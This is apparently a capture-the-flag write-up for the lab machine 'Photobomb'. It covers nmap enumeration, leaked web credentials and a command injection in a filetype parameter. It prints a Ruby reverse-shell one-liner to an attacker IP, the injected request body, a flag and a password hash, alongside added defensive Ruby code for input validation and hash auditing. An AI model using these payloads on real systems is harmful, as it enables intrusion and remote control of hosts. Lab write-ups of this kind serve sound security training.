Photobomb

  • initial SYN nmap scan shows two open ports

    sudo nmap -sS -oA nmap/initial_scan 10.129.165.17
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-18 10:44 EST
    Nmap scan report for 10.129.165.17
    Host is up (0.12s latency).
    Not shown: 998 closed tcp ports (reset)
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http

    Nmap done: 1 IP address (1 host up) scanned in 2.48 seconds

  • second nmap scan using the default scripts shows port 80 redirects to photobomb.htb

    sudo nmap -sV -sC -oA nmap/default_script_scan 10.129.165.17
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
    | 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
    |_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
    80/tcp open http nginx 1.18.0 (Ubuntu)
    |_http-title: Did not follow redirect to http://photobomb.htb/
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • added photobomb.htb to /etc/hosts

  • another nmap scan using the http-enum script to enumerate common directories on port 80

    sudo nmap -sV --script=http-enum -oA nmap/http_enum_scan -p 80 10.129.165.17
    PORT STATE SERVICE VERSION
    80/tcp open http nginx 1.18.0 (Ubuntu)
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    | http-enum:
    | /printer/image: Lexmark Printer (401 Unauthorized)
    | /printer/: Potentially interesting folder (401 Unauthorized)
    |_ /printers/: Potentially interesting folder (401 Unauthorized)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • going to /printer we see it is password protected

  • using whatweb to see what technologies the web app uses

    whatweb photobomb.htb
    http://photobomb.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)],
    IP[10.129.165.17], Script, Title[Photobomb], UncommonHeaders[x-content-type-options],
    X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block], nginx[1.18.0]

  • ran a full TCP nmap scan to see if there were any other open ports; there were none

  • viewing source of homepage we see photobomb.js which includes credentials for /printer

    pH0t0:b0Mb!
    username: pH0t0
    password: b0Mb!

  • we use Burp to intercept the image download request from /printer

  • we see it sending 3 POST parameters: photo, filetype and dimensions

  • the filetype value is not sanitised before being used in a shell command, so appending ; after it lets us inject a command and get RCE, here via a Ruby reverse shell

    ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.36",9000))'

  • so we change the request body in Burp to

    photo=wolfgang-hasselmann-RLEgmd1O7gs-unsplash.jpg&filetype=jpg;ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.36",9000))'&dimensions=3000x2000
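  The root cause above is a user-controlled value reaching a shell. The following is an added example, not the Photobomb application's own code: it shows how the photo/filetype/dimensions parameters should be handled so that a value like jpg;ruby ... can never become a command. The image directory, the regexes, the size limits and the convert command line are assumptions for illustration; the sample request body is the one captured above.

```ruby
# Added example: hardened handling of the /printer download parameters.
# Not the application's own code; paths and limits are assumed.

PHOTO_DIR = '/var/www/photobomb/public/images'.freeze   # assumed location
ALLOWED_FILETYPES = %w[jpg png].freeze                   # strict allowlist
PHOTO_RE      = /\A[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.(jpe?g|png)\z/
DIMENSIONS_RE = /\A(\d{1,4})x(\d{1,4})\z/
MAX_SIDE      = 4000

# Validate the three user-supplied parameters against allowlists.
# Returns [ok, errors]. Shell metacharacters such as ';', '|', '$' or
# whitespace never match these patterns, so they are rejected before any
# command line is assembled.
def validate_params(params)
  errors   = []
  photo    = params['photo'].to_s
  filetype = params['filetype'].to_s
  dims     = params['dimensions'].to_s

  errors << 'photo: invalid filename' unless PHOTO_RE.match?(photo)
  errors << 'photo: path separator not allowed' if photo.include?('/') || photo.include?('..')
  errors << 'filetype: not in allowlist' unless ALLOWED_FILETYPES.include?(filetype)

  m = DIMENSIONS_RE.match(dims)
  if m.nil?
    errors << 'dimensions: must be WIDTHxHEIGHT'
  elsif [m[1].to_i, m[2].to_i].any? { |n| n.zero? || n > MAX_SIDE }
    errors << "dimensions: each side must be 1..#{MAX_SIDE}"
  end
  [errors.empty?, errors]
end

# Build the converter invocation as an argv array. Kernel#system and
# Process.spawn given an array (not a single string) do not involve /bin/sh,
# so each element is exactly one argument to the program. Combined with the
# allowlist above, the string "jpg;ruby -rsocket ..." cannot be executed.
def build_convert_argv(params)
  ok, errors = validate_params(params)
  raise ArgumentError, errors.join('; ') unless ok

  photo = params['photo']
  dims  = params['dimensions']
  src   = File.join(PHOTO_DIR, photo)
  dst   = File.join(PHOTO_DIR, "#{File.basename(photo, '.*')}_#{dims}.#{params['filetype']}")
  ['convert', src, '-resize', dims, dst]
end

# Run the conversion without a shell. Returns true on success, false otherwise.
def run_conversion(params)
  system(*build_convert_argv(params))
end

if $PROGRAM_NAME == __FILE__
  # Constructed inputs: the legitimate request and the injected one from the write-up.
  good = { 'photo' => 'wolfgang-hasselmann-RLEgmd1O7gs-unsplash.jpg',
           'filetype' => 'jpg', 'dimensions' => '3000x2000' }
  bad  = good.merge('filetype' => "jpg;ruby -rsocket -e'spawn(\"sh\")'")
  p validate_params(good)   # => [true, []]
  p validate_params(bad)    # => [false, ["filetype: not in allowlist"]]
  p build_convert_argv(good)
end
```

  Two properties matter here: rejection happens on an allowlist (what a filetype may be), not on a denylist of characters, and the program is invoked with an argv array so that no shell ever parses the values.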

  • upgrade the shell to a tty

    python3 -c 'import pty;pty.spawn("/bin/bash")'

  • we can get user flag now: ecb6bbe9e8cd2a2aba478e7c85779f48

  • found .htpasswd in /home/wizard/photobomb

    pH0t0:$apr1$dnyF00ZD$9PifZwUxL/J0BCS/wTShU1
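  The $apr1$ prefix marks an Apache MD5-based hash, a fast scheme that offers little protection once the file is readable. As an added example (not part of the write-up or the box), the following audits an htpasswd file and flags entries using weak schemes; the first sample line is the one found above, the bcrypt line is a constructed placeholder rather than a real hash.

```ruby
# Added example: classify htpasswd entries by hash scheme and flag weak ones.
# Not code from the box; the bcrypt entry below is constructed, not a real hash.

# Constructed sample htpasswd contents.
HTPASSWD_SAMPLE = <<~TXT
  pH0t0:$apr1$dnyF00ZD$9PifZwUxL/J0BCS/wTShU1
  # comment lines and blanks are ignored

  auditor:$2y$12$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ01234567
TXT

# Map a stored hash string to a scheme symbol and a weakness verdict.
# Schemes recognised follow the formats htpasswd(1) can write.
def classify_hash(hash)
  case hash
  when /\A\$2[aby]\$\d{2}\$/   then [:bcrypt, false]      # adaptive, salted
  when /\A\$apr1\$/           then [:apr1_md5, true]     # Apache MD5, fast
  when /\A\$1\$/              then [:md5_crypt, true]    # glibc MD5, fast
  when /\A\{SHA\}/            then [:sha1, true]         # unsalted SHA-1
  when /\A[A-Za-z0-9.\/]{13}\z/ then [:des_crypt, true]  # 8-char truncation
  else                             [:unknown_or_plain, true]
  end
end

# Parse htpasswd text into [{user:, scheme:, weak:}] entries.
def parse_htpasswd(text)
  text.each_line.filter_map do |line|
    line = line.strip
    next if line.empty? || line.start_with?('#')
    user, hash = line.split(':', 2)
    next if hash.nil?
    scheme, weak = classify_hash(hash)
    { user: user, scheme: scheme, weak: weak }
  end
end

# Return the usernames whose stored hash uses a weak scheme.
def weak_users(text)
  parse_htpasswd(text).select { |e| e[:weak] }.map { |e| e[:user] }
end

if $PROGRAM_NAME == __FILE__
  parse_htpasswd(HTPASSWD_SAMPLE).each do |e|
    puts format('%-10s %-17s %s', e[:user], e[:scheme], e[:weak] ? 'WEAK' : 'ok')
  end
end
```

  Pointing this at a real file (File.read('.htpasswd')) gives a quick list of accounts to re-hash with htpasswd -B, which selects bcrypt.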

  • running sudo -l we see we can run a script as root without a password